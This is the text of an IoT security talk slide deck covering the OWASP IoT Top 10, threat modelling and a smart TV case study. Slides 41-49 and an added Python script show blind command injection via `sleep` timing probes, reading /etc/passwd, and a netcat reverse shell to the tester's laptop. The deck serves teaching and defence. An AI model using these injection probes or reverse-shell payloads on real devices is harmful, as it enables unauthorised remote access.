2. #WHOAMI
§ Mission: To promote cybersecurity at large
§ Moonlighting as an Open Web Application Security Project (OWASP) Evangelist
§ Secretary for the Association of Information Security Professionals (AiSP)
§ Advisor for the Singapore Honeynet Project
§ OWASP Global Education Committee (GEC) alumni member
§ Co-authored the OWASP Testing Guides v3.0 and v4.0
§ Co-authored the WASC TC v2.0
§ Volunteer Teacher @Hacking Lab (https://www.hacking-lab.com)
§ Judge for the CSA Cybersecurity Awards 2018/2019 and WorldSkills Competition (Cybersecurity) 2018/2019
3. OVERVIEW
• Motivation
• Challenge with IoT
• Security & Privacy Risks with IoT
• OWASP IoT Top 10
• Threat Modelling IoT
• Attacking the IoT Stack
• Sample Case Study
4. IOT
What is IoT?
“A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”
5. WHAT IS IOT?
o Belkin Wemo
o Nespresso Prodigio
o Nest
o Philips Hue
o Garmin Forerunner
o Fitbit
o Withings Blood Pressure Monitor
o Meat Thermometers
o Weather Stations
o Ring doorbell
o IP Cameras
o Amazon Dash Buttons
o Amazon Echo (Alexa)
o IP Phones
o Pool Pumps
o Door Locks
o Video Game Consoles
o Alarm Systems
6. MOTIVATION
• IoT Security spending is rapidly increasing
• IoT introduces an increased number of security threats
• IoT security happens on 4 different layers
• Increasing automation of IoT security tasks
• Cyberespionage groups and petty criminals are the most common IoT attackers
7. IOT SECURITY HAPPENS ON 4 DIFFERENT LAYERS
Device, Communications, Cloud & Lifecycle Management
Source: IoT Analytics
8. IOT IS MORE THAN CONSUMER
Hardware hacking “Junk hacking”
“Stunt hacking”
9. IOT BEYOND THE HYPE
Sectorial/Municipal IoT
o Smart cities
o Smart grid
Industrial IoT
o Connected factories
o Agriculture
o Logistics
Medical IoT
o Smart hospitals
o Electronic medical records
11. SECURITY AND PRIVACY RISKS WITH IOT
Heavy startup presence in the field creates security risks
o Devices are often crowdfunded or created by new companies who dedicate their limited resources to functionality over security
o A recent Hewlett Packard study found that 100% of the home security IoT devices they studied had significant security vulnerabilities
No governing body or industry standards for IoT security
o Devices are vulnerable to external threats (hackers, ransomware, etc.) and internal mishandling/errors by legitimate custodians of the data
Even people who have not purchased an IoT device may be contributing data to it unknowingly
o August Smart Locks
o Amazon Echo
12. DATA PRIVACY RISKS
Business, employee, and client information could be:
• Destroyed
• Altered
• Stolen and exposed
• Held for ransom
Understand IoT device data collection policies:
• What information is gathered?
• How long is the data kept?
• What is the data used for (marketing research, etc.)?
13. THE POWER OF IOT
• Big data provides analytics
• Business process optimizations
• Multiple concurrent access
14. WHY IT LOOKS SO BAD
Breakers have a long history and robust tools
o Automated network attack tools
o Exploits for most segments of IoT stack
o Physical access and hardware hacking
Builders are still searching for
o Secure toolkits
o Proven methodologies
o Successful models
Result:
o Builders cobble together components
o Build very fragile full stack solutions
o No visibility into security or attack surface
o Attackers have a field day
15. IOT SEARCH ENGINES
• Internet of Things Scanner: https://iotscanner.bullguard.com/
• Shodan: https://www.shodan.io/
• Thingful: https://www.thingful.net/
• ZoomEye: https://www.zoomeye.org/
16. MISERABLE TRACK RECORD THUS FAR
Luckily most tests are of consumer IoT
http://www8.hp.com/h20195/V2/GetPDF.aspx/4AA5-4759ENW.pdf
Testing industrial, sectorial, and other IoT is much trickier
Most have heterogeneous brownfield deployments
Testers can’t just pop down to NTUC Fairprice to get access to these deployments
SecuringSmartCities.org has done some testing
If history is a guide, though, things are probably not good
18. OWASP IOT PROJECT
An overall IoT security effort
o Attack surfaces (present)
o Vulnerability lists (working)
o Reference solutions (coming)
Aggregates community resources
Guidance for manufacturers, developers and consumers
IoT specific security principles
IoT framework assessment
19. OWASP IOT TOP 10 (CIRCA 2014)
Each category is listed with its IoT security consideration and the corresponding recommendation.
I1: Insecure Web Interface
o Consideration: Ensure that any web interface coding is written to prevent the use of weak passwords …
o Recommendation: When building a web interface consider implementing lessons learned from web application security. Employ a framework that utilizes security …
I2: Insufficient Authentication/Authorization
o Consideration: Ensure that applications are written to require strong passwords where authentication is needed …
o Recommendation: Refer to the OWASP Authentication Cheat Sheet
I3: Insecure Network Services
o Consideration: Ensure applications that use network services don't respond poorly to buffer overflow, fuzzing …
o Recommendation: Try to utilize tested, proven networking stacks and interfaces that handle exceptions gracefully...
I4: Lack of Transport Encryption
o Consideration: Ensure all applications are written to make use of encrypted communication between devices…
o Recommendation: Utilize encrypted protocols wherever possible to protect all data in transit…
I5: Privacy Concerns
o Consideration: Ensure only the minimal amount of personal information is collected from consumers …
o Recommendation: Data can present unintended privacy concerns when aggregated…
I6: Insecure Cloud Interface
o Consideration: Ensure all cloud interfaces are reviewed for security vulnerabilities (e.g. API interfaces and cloud-based web interfaces) …
o Recommendation: Cloud security presents unique security considerations, as well as countermeasures. Be sure to consult your cloud provider about options for security mechanisms…
I7: Insecure Mobile Interface
o Consideration: Ensure that any mobile application coding is written to disallow weak passwords …
o Recommendation: Mobile interfaces to IoT ecosystems require targeted security. Consult the OWASP Mobile …
I8: Insufficient Security Configurability
o Consideration: Ensure applications are written to include password security options (e.g. enabling 20-character passwords or enabling two-factor authentication)…
o Recommendation: Security can be a value proposition. Design should take into consideration a sliding scale of security requirements…
I9: Insecure Software/Firmware
o Consideration: Ensure all applications are written to include update capability and can be updated quickly …
o Recommendation: Many IoT deployments are either brownfield and/or have an extremely long deployment cycle...
I10: Poor Physical Security
o Consideration: Ensure applications are written to utilize a minimal number of physical external ports (e.g. USB ports) on the device…
o Recommendation: Plan on having IoT edge devices fall into malicious hands...
20. OWASP IOT TOP 10: 2018
• I1: Weak, Guessable, or Hardcoded Passwords
• I2: Insecure Network Services
• I3: Insecure Ecosystem Interfaces
• I4: Lack of Secure Update Mechanism
• I5: Use of Insecure or Outdated Components
• I6: Insufficient Privacy Protection
• I7: Insecure Data Transfer and Storage
• I8: Lack of Device Management
• I9: Insecure Default Settings
• I10: Lack of Physical Hardening
Source: https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project
21. PRINCIPLES OF IOT SECURITY
• Assume a hostile edge
• Test for scale
• Internet of lies
• Exploit autonomy
• Expect isolation
• Protect uniformly
• Encryption is tricky
• System hardening
• Limit what you can
• Lifecycle support
• Data in aggregate is unpredictable
• Plan for the worst
• The long haul
• Attackers target weakness
• Transitive ownership
• N:N Authentication
23. ATTACKERS
Targeted Attack
XYZ Entertainment has a lot of intellectual property that I can sell on the black market. I’m going to figure out how to break in via the IoT devices used.
• Target identified first
• ONLY THEN is the attack considered
• More effort spent planning and executing
• Usually targeting larger organisations (may not necessarily be true now)
Opportunistic Attack
I know how to compromise an embedded device with a known vulnerability. I’m going to scan the Internet to find unpatched devices and see whether I can access some valuable data and inject malicious code to infect visitors with the weaponized device.
• Exploit and vulnerability identified first
• Target doesn't matter, just needs to be vulnerable to exploit
• Low-hanging fruit
• Smaller organisations usually fall victim (may not necessarily be true now)
25. STATE OF IOT SECURITY
What we often see in IoT implementations
• Security maturity about a decade behind
o Weak/default credentials
o Replay attacks
o Lack of or weak encryption
• Often difficult or impossible to patch
• Very large ecosystem
o Many different connectors, standards, platforms, frameworks, etc.
• Security through obscurity
• Many embedded developers assume their code will operate in a trusted environment
26. ATTACKING IOT DEVICES (IOT STACK)
• Device
• User/Management Interfaces
o Mobile Applications
o Web
o Thick Clients
• Hardware Input and Output
• Hardware sensors
• Local/Global Network
• Wireless (BLE, ZigBee, Wi-Fi, etc.)
• Cloud Services/APIs
40. SO WHERE DOES THAT LEAVE US WITH TM?
Take all the assets
Associate threat types with each asset
Voila! List of things we need to worry about
41. THE VULNERABILITY ON THE SMART TV
• Looking for a way in…
• Try an arbitrary command: `sleep 5`
42. THE FIELDWORK
• The menu froze for a while.
• Suspected that the injected backtick characters were the cause: maybe the TV did not expect them and threw an error which prevented the menu from loading.
• Typed in “television `sleep 0`” and tried it again. It loaded instantly.
• Decided to measure the time. It turned out that it always took the television set three times longer than the input number to become responsive, as shown below:
o sleep(2) - 6 seconds
o sleep(3) - 9 seconds
o sleep(5) - 15 seconds
43. RUNNING THE COMMANDS
• Test cases (Chars = character count of the command; Succeeded = whether the menu stalled)
• `which nc && sleep 2` (19 chars): Succeeded: Yes
o which is a Linux command that returns the path to a program if it exists. && sleep 2 would freeze the menu for 3*2 seconds if which found nc on the TV set.
• `which ssh && sleep 2` (20 chars): Succeeded: No
o Wanted to see if ssh was installed.
• `which wget && sleep 2` (21 chars): Succeeded: Yes
o But it had wget.
• `cat /etc/passwd && sleep 2` (26 chars): Succeeded: Yes
o Wanted to see if /etc/passwd was readable. It was, and it would have been a big surprise if it wasn't.
• `cat /etc/shadow && sleep 2` (26 chars): Succeeded: No
o This one is interesting. When there are root privileges the /etc/shadow file is readable. I wanted to test if I am root but the file wasn’t readable.
• `ls /etc/shadow && sleep 2` (25 chars): Succeeded: No
o This is the explanation why the shadow file couldn’t be opened. It just didn’t exist.
44. GETTING SHELL ACCESS
• Plugged in the ethernet cable and connected the TV to the laptop
• Ran “ipconfig” to determine the IP of the laptop
45. GETTING SHELL ACCESS
• A reverse shell would be handy because it would bypass any possible firewall
rules blocking incoming connections.
• But before thinking about how to get one in less than 29 characters it is good
to learn a little bit more about the system.
46. GETTING SHELL ACCESS
• It was discovered that nc is installed on the TV set, so the next action is to pipe the output of certain commands through nc back to the laptop.
• The first command executed was “id”, which would indicate whether or not the injected commands run with root privileges by default on the Smart TV set.
47. GETTING SHELL ACCESS
• The next thing was to obtain a directory listing of / with `ls -la /|nc 169.254.56.216 5`
• Still there was no shell to issue proper commands. All of them were more or less length restricted and not too useful.
48. GETTING SHELL ACCESS
• Since the version of nc installed on the TV supported the -e flag, it was easy to get a reverse shell with: `nc 169.254.213.210 5 -e sh`
• Perfect. There is now a proper shell to work with.
• There were multiple possibilities to mess with the TV in a visible way.
49. GETTING SHELL ACCESS
• With this access, the avenues available include changing the logo shown during the boot-up process or changing the app icons.
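The whole procedure of slides 41 to 48 (the `sleep` timing oracle, the length-budgeted `&& sleep 2` probes, and the final `nc -e sh` reverse shell) as one added example. This is not the original researcher's tooling and not code from the deck: the TV is replaced by a constructed simulator (SIM_BINARIES and SIM_FILES, chosen to reproduce the Yes/No column of the test-case slide), the 3x stall and the "less than 29 characters" limit are taken from the slides, and the assumption that the limit counts the backticks is mine (every payload on the slides satisfies it, the reverse shell exactly).

```python
"""Blind, length-limited command injection probed through a timing oracle.

Added example for the smart TV case study; not the original researcher's
tooling. The slides observed that `sleep N` stalls the menu for 3*N seconds
and that the injection field takes fewer than 29 characters. The device
itself is replaced by a constructed simulator so the script runs offline.
"""

ECHO_FACTOR = 3       # observed on the device: sleep(N) stalls the menu 3*N s
MAX_INJECT = 28       # "less than 29 characters"; assumption: backticks count too
TOLERANCE = 0.5       # seconds of jitter tolerated around the expected stall

# Constructed model of the TV's userland, chosen to reproduce the slide's results.
SIM_BINARIES = {"nc": "/bin/nc", "wget": "/usr/bin/wget", "sh": "/bin/sh"}
SIM_FILES = {"/etc/passwd": "root:x:0:0:root:/root:/bin/sh\n"}   # no /etc/shadow


def wrap(cmd: str) -> str:
    """Backtick-wrap a command so the TV's shell substitutes its output."""
    return f"`{cmd}`"


def inner_len(cmd: str) -> int:
    """Length of the command itself, the 'Chars' column on the test-case slide."""
    return len(cmd)


def fits_budget(cmd: str, limit: int = MAX_INJECT) -> bool:
    """True if the backtick-wrapped command fits the input field."""
    return len(wrap(cmd)) <= limit


def simulate_tv(injected: str) -> float:
    """Stand-in for the device: returns the seconds the menu would stay frozen.

    Evaluates 'a && b && ...' left to right like a POSIX shell, stopping at
    the first failing command; every 'sleep N' that is reached costs
    ECHO_FACTOR * N seconds, modelling the 3x stall seen on the slides.
    """
    cmd = injected.strip("`")
    delay = 0.0
    for part in (p.strip() for p in cmd.split("&&")):
        argv = part.split()
        if not argv:
            return delay
        prog, args = argv[0], argv[1:]
        if prog == "sleep":
            delay += ECHO_FACTOR * float(args[0])
            ok = True
        elif prog == "which":
            ok = all(a in SIM_BINARIES for a in args)
        elif prog in ("cat", "ls"):
            ok = all(a in SIM_FILES for a in args)
        else:
            ok = False                       # unknown command: non-zero exit
        if not ok:
            break                            # && short-circuits on failure
    return delay


def infer_echo_factor(samples):
    """Ratio of observed stall to requested sleep, e.g. [(2, 6), (3, 9)] -> 3.0."""
    ratios = [observed / requested for requested, observed in samples if requested]
    return round(sum(ratios) / len(ratios), 2)


def blind_probe(cmd: str, run=simulate_tv, sleep_s: int = 2) -> bool:
    """Decide whether `cmd` exited 0 on the device using only the stall time.

    Sends `cmd && sleep N`; the sleep only runs if cmd succeeded, so a stall of
    about ECHO_FACTOR*N seconds above the `sleep 0` baseline means success.
    """
    probe = f"{cmd} && sleep {sleep_s}"
    if not fits_budget(probe):
        raise ValueError(f"{probe!r} exceeds the {MAX_INJECT}-char field")
    baseline = run(wrap("sleep 0"))          # the slide's 'television `sleep 0`' check
    stalled = run(wrap(probe)) - baseline
    return stalled >= ECHO_FACTOR * sleep_s - TOLERANCE


def reverse_shell_payload(ip: str, port: int, shell: str = "sh") -> str:
    """Final stage from the slides; a one-digit port keeps it inside the budget."""
    return f"nc {ip} {port} -e {shell}"


if __name__ == "__main__":
    for cmd in ("which nc", "which ssh", "which wget",
                "cat /etc/passwd", "cat /etc/shadow", "ls /etc/shadow"):
        print(f"{cmd:<16} -> {'Yes' if blind_probe(cmd) else 'No'}")
    shell = reverse_shell_payload("169.254.213.210", 5)
    print(shell, len(wrap(shell)), "chars wrapped, fits:", fits_budget(shell))
```

Run it directly to see the six probes classified and the reverse-shell payload checked against the budget. The budget is what shapes the final stage: a single-digit listener port and `-e sh` rather than `-e /bin/sh` keep `nc 169.254.213.210 5 -e sh` at exactly 28 characters with the backticks, whereas a four-digit port with `/bin/sh` would be 36 and never fit the field.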
50. SOME SMART TV VULNERABILITIES
Some recent Smart TV vulnerabilities that were discovered:
• CVE-2018-16595: Stack buffer overflow memory corruption vulnerability that could lead to an app crash.
• CVE-2018-16594: Directory traversal where an attacker can upload an arbitrary file with a crafted file name (e.g. ../../) that can then traverse the whole filesystem.
• CVE-2018-16593: Command injection vulnerability that allows arbitrary commands to be run on the system, which can result in complete remote code execution with root privileges.
51. FINAL THOUGHTS
Privacy in the realm of big data is a problem
No real technical solution to this one
Regulation is probably coming
A few organisations (e.g. the FTC) are set to release guidelines next year
Consumers may eschew security but businesses will not
Security can be a differentiator
52. IN CONCLUSION
Source: Singapore Cyber Landscape 2018 Report, page 49, https://www.csa.gov.sg/~/media/csa/documents/publications/csasingaporecyberlandscape2018.pdf
Ref#19: Boddy, Sara and Shattuck, Justin. “The Hunt for IoT: The Growth and Evolution of Thingbots Ensures Chaos,” F5 Labs – Threat Analysis Report, 13 March 2018, https://www.f5.com/labs/articles/threat-intelligence/the-hunt-for-iot-the-growth-and-evolution-of-thingbots-ensures-chaos
53. THANK YOU
CECIL SU, DIRECTOR OF TECHNOLOGY RISK ADVISORY
CYBERSECURITY & DIGITAL FORENSICS INCIDENT RESPONSE
BDO ADVISORY (SINGAPORE)
TEL : +65 6828 9118
DID : +65 6829 9628
EMAIL : CECILSU@BDO.COM.SG